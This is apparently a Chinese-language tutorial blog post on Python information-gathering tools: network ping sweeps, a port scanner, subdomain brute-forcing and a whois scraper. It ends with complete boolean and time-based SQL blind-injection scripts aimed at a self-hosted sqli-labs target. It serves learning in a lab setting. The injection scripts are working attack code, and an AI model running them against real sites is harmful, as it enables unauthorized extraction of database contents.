python信息收集
一、主机扫描
1.1 扫描网段
#!/usr/bin/python3
import os
"""
扫描一个网段
"""
def scan_ip(ip):
# 经检验os.system不支持&>/dev/null的重定向写法
result = os.system(f"ping -c2 -i0.1 {ip} >/dev/null 2>/dev/null")
if result == 0:
print(f"The host {ip} is up")
def scan_net():
net = input("please input a network,<eg:10.1.1.>:")
for i in range(1,255):
ip = net + str(i)
scan_ip(ip)
if __name__ == '__main__' :
scan_net()
1.2 扫描网段(多线程)
#!/usr/bin/python3
import os
import threading
import time
"""
扫描一个网段
"""
def scan_ip(ip):
"""
扫描一个ip
"""
# 经检验os.system不支持&>/dev/null的重定向写法
result = os.system(f"ping -c2 -i0.1 {ip} >/dev/null 2>/dev/null")
if result == 0:
print(f"The host {ip} is up")
def scan_net():
"""
多线程扫描网段
"""
net = input("please input a network,<eg:10.1.1.>:")
start = time.time()
threads = []
for i in range(1,255):
ip = net + str(i)
# 设置线程,target目标函数名,args参数:元组形式,如果只有一个参数要加逗号
t = threading.Thread(target=scan_ip,args=(ip,))
threads.append(t)
# 开启线程
t.start()
# 保证每个线程都运行完毕
for i in threads:
i.join()
# 记录结束时间
end = time.time()
print(f"扫描完毕。用时{end-start:.3f}秒")
if __name__ == '__main__' :
scan_net()
1.3 扫描网段(结果保存为文件)
#!/usr/bin/python3
import os
import threading
import time
"""
扫描一个网段
"""
def scan_ip(ip):
"""
扫描一个ip
"""
result = os.system(f"ping -c2 -i0.1 {ip} >/dev/null 2>/dev/null")
if result == 0:
with open("uphost.txt","a") as f:
f.write(f"The host {ip} is up")
def scan_net():
"""
多线程扫描网段
"""
net = input("please input a network,<eg:10.1.1.>:")
start = time.time()
threads = []
for i in range(1,255):
ip = net + str(i)
# 设置线程,target目标函数名,args参数:元组形式,至少两个实参,如果只有一个参数要加逗号
t = threading.Thread(target=scan_ip,args=(ip,))
threads.append(t)
# 开启线程
t.start()
# 保证每个线程都运行完毕
for i in threads:
i.join()
# 记录结束时间
end = time.time()
print(f"扫描完毕。用时{end-start:.3f}秒")
if __name__ == '__main__' :
scan_net()
二、端口扫描
端口范围1-65535
#!/usr/bin/python3
import socket
import sys
import time
import tqdm
def scan_port():
"""
扫描多个端口
"""
try:
ip = input("扫描的ip:")
portstart = input("起始端口号:")
portend = input("结束端口号:")
# socket编程:制作一个可以联网的app
# socket.AF_INET:定义制作基于tcp/ip架构的APP
# socket.SOCK_STREAM:制作基于TCP协议的app / socket.SOCK_DGRAM:制作基于UDP协议的app
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
result = ""
start = time.time()
# 循环端口。添加进度条:配合for循环tqdm.tqdm(取值范围)
for port in tqdm.tqdm(range(int(portstart), int(portend))):
target = (ip,port)
# 传入元组形式的参数,尝试连接,结果为0代表端口开放,非0不开放
data = client.connect_ex(target)
if data == 0:
result = result+ f"The port {ip}:{port} is up\n"
# 关闭app
client.close()
end = time.time()
# 循环结束后打印结果,防止干扰进度条显示
print(f"扫描结束,总共耗时{end-start:.3f}s")
print(result)
except KeyboardInterrupt:
print("bye")
sys.exit()
except:
pass
if __name__ == "__main__":
scan_port()
三、子域名爆破
#!/usr/bin/python
import socket
import time
import sys
"""
根据域名和字典查找子域名及ip
"""
def scan_subdomain():
domain_name = input("请输入域名:")
wordlists = input("请输入子域名字典文件名:")
for i in open(wordlists):
# rstrip()默认删除右侧空白字符
name = i.rstrip() + "." + domain_name
try:
ip = socket.gethostbyname(name)
print(f"域名{name}的IP地址为:{ip}")
time.sleep(0.1)
except KeyboardInterrupt:
sys.exit()
except:
time.sleep(0.1)
if __name__ == '__main__':
scan_subdomain()
四、whois查询
利用iP地址查询进行whois查询,并用爬虫将结果保存
#!/usr/bin/python3
import sys
import requests
import bs4
def get_url():
"""
打开url文本,逐行读取url并返回url列表
"""
try:
with open('url.txt','r')as file:
urls = []
for line in file:
urls.append(line.strip())
return urls
except:
print("无法读取文件")
sys.exit()
def get_html(url):
"""
给出界面url地址,返回该界面html字符串
"""
ua = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"}
cookie = {
"Hm_lpvt_aac43b0aec3a1123494f170e0aec4778": "1733104269",
"Hm_lvt_aac43b0aec3a1123494f170e0aec4778": "1733104262",
"HMACCOUNT": "6F8CE7D515F473C2"
}
newurl = f"https://site.ip138.com/{url}/whois.htm"
# 添加伪装ua和cookie
response = requests.get(newurl, headers=ua, cookies=cookie)
# 返回源码,默认utf8解码
return response.text
def get_whois(url):
"""
根据查询结果界面url,获得结果文本
"""
# 得到html字符串
html = get_html(url)
# 得到bs4分析html的结果(固定写法)
result = bs4.BeautifulSoup(html, "html.parser")
# 过滤查找内容
whois = result.find("div",id="whois")
return whois.text
def put_result(text):
"""
将字符串追加到whois_result.txt文件中
"""
try:
with open("whois_result.txt", 'a') as file:
file.write(text)
except:
print("写入结果失败")
def get_whoiss():
# 获取url列表
urls = get_url()
for i in urls:
put_result(get_whois(i))
if __name__ == "__main__":
get_whoiss()
五 SQL盲注
自己搭建sqli靶场进行测试
5.1 布尔盲注
原理:根据页面是否正常显示来判断语句正误
思路:先得到页面正确回显,记录源码大小。进行盲注,与正常回显比较大小,如果一致则说明成功。
#!/usr/bin/python3
import sys
import requests
import string
import tqdm
def boolsql_type(url):
"""
根据正常显示的url,通过布尔盲注的形式来判断注入点的注入类型
integer:数字型、single:单引号字符型、double:双引号字符型
若判断不出来就结束程序
"""
# 获得并记录正常回显长度
response = requests.get(url)
normallen = len(response.text)
payload = " and 1=2 --+"
if len(requests.get(url+payload).text) == normallen:
payload = "' and 1=2 --+"
if len(requests.get(url + payload).text) == normallen:
payload = "\" and 1=2 --+"
if len(requests.get(url + payload).text) == normallen:
print("请检查此处是否为布尔盲注点")
sys.exit()
else:
print("双引号字符型布尔盲注")
return "double"
else:
print("单引号字符型布尔盲注")
return "single"
else:
print("数字型布尔盲注")
return "integer"
def bool_sql(url):
"""
利用布尔盲注测试数据库长度及名称
"""
# 获取注入类型
type = boolsql_type(url)
# 字符一定要加引号 数据库不认不加引号的字符
# 之后要替换STR不能小写,会导致substr被破坏
if type == "integer":
lenpayload = f"{url} and length(database())=num --+"
namepayload = f"{url} and substr(database(),num,1)=\"STR\" --+"
elif type == "single":
lenpayload = f"{url}' and length(database())=num --+"
namepayload = f"{url}' and substr(database(),num,1)=\"STR\" --+"
else:
lenpayload = f"{url}\" and length(database())=num --+"
namepayload = f"{url}\" and substr(database(),num,1)='STR' --+"
# 获得并记录正常回显长度
response = requests.get(url)
normallen = len(response.text)
# 布尔盲注猜测数据库名称长度
dblen = 1
while True:
print(f"测试长度为{dblen}.....")
exp = lenpayload.replace("num", str(dblen))
test_response = requests.get(exp)
if len(test_response.text) == normallen:
print(f"数据库名称长度为{dblen}")
break
dblen += 1
# 布尔盲注猜测数据库名称
# string模块中预定义的字符 小写字母、大写字母、数字、下划线
stra = string.ascii_lowercase + string.ascii_uppercase+string.digits+"_"
dbname = ""
print("开始测试数据库名")
for i in tqdm.tqdm(range(1,dblen+1)):
for j in stra:
tem = namepayload.replace("num",str(i))
exp = tem.replace("STR",j)
test_response = requests.get(exp)
if len(test_response.text) == normallen:
dbname = dbname + j
break
print(f"数据库名为:{dbname}")
if __name__ == '__main__':
bool_sql("http://192.168.1.3/sqli/Less-8/?id=1")
5.2 时间盲注
原理:添加sleep函数,根据页面加载时间是否变换判断注入是否成功
思路:添加sleep后设置响应超时时间,一旦超时就异常捕获,说明注入成功
#!/usr/bin/python3
import sys
import requests
import string
import tqdm
def timesql_type(url):
"""
根据正常显示的url,通过时间盲注的形式来判断注入点的注入类型
intiger:数字型、single:单引号字符型、double:双引号字符型
若判断不出来就结束程序
"""
try:
payload = " and sleep(3) --+"
requests.get(url+payload,timeout=3)
except requests.exceptions.ReadTimeout:
print("数字型时间盲注")
return "integer"
try:
payload = "' and sleep(3) --+"
requests.get(url + payload, timeout=3)
except requests.exceptions.ReadTimeout:
print("单引号字符型时间盲注")
return "single"
try:
payload = "\" and sleep(3) --+"
requests.get(url + payload, timeout=3)
except requests.exceptions.ReadTimeout:
print("双引号字符型时间盲注")
return "double"
print("请检查注入点是否可以sql注入")
sys.exit()
def time_sql(url):
"""
利用时间盲注测试数据库长度及名称
"""
# 获取注入类型
type = timesql_type(url)
#字符一定要加引号 数据库不认不加引号的字符
if type == "integer":
lenpayload = f"{url} and if(length(database())=num,sleep(3),true) --+"
namepayload = f"{url} and if(substr(database(),num,1)=\"STR\",sleep(3),true) --+"
elif type == "single":
lenpayload = f"{url}' and if(length(database())=num,sleep(3),true) --+"
namepayload = f"{url}' and if(substr(database(),num,1)=\"STR\",sleep(3),true) --+"
else:
lenpayload = f"{url}\" and if(length(database())=num,sleep(3),true)--+"
namepayload = f"{url}\" and if(substr(database(),num,1)=\"STR\",sleep(3),true) --+"
# 布尔盲注猜测数据库名称长度
dblen = 1
while True:
print(f"测试长度为{dblen}.....")
exp = lenpayload.replace("num", str(dblen))
try:
requests.get(exp,timeout=3)
except requests.exceptions.ReadTimeout:
print(f"数据库名称长度为{dblen}")
break
dblen += 1
# 布尔盲注猜测数据库名称
# string模块中预定义的字符 小写字母、大写字母、数字、下划线
stra = string.ascii_lowercase + string.ascii_uppercase+string.digits+"_"
dbname = ""
print("开始测试数据库名")
for i in tqdm.tqdm(range(1,dblen+1)):
for j in stra:
tem = namepayload.replace("num",str(i))
exp = tem.replace("STR",j)
try:
requests.get(exp, timeout=3)
except requests.exceptions.ReadTimeout:
dbname = dbname + j
break
print(f"数据库名为:{dbname}")
if __name__ == '__main__':
time_sql("http://192.168.1.3/sqli/Less-9/?id=1")
浙公网安备 33010602011771号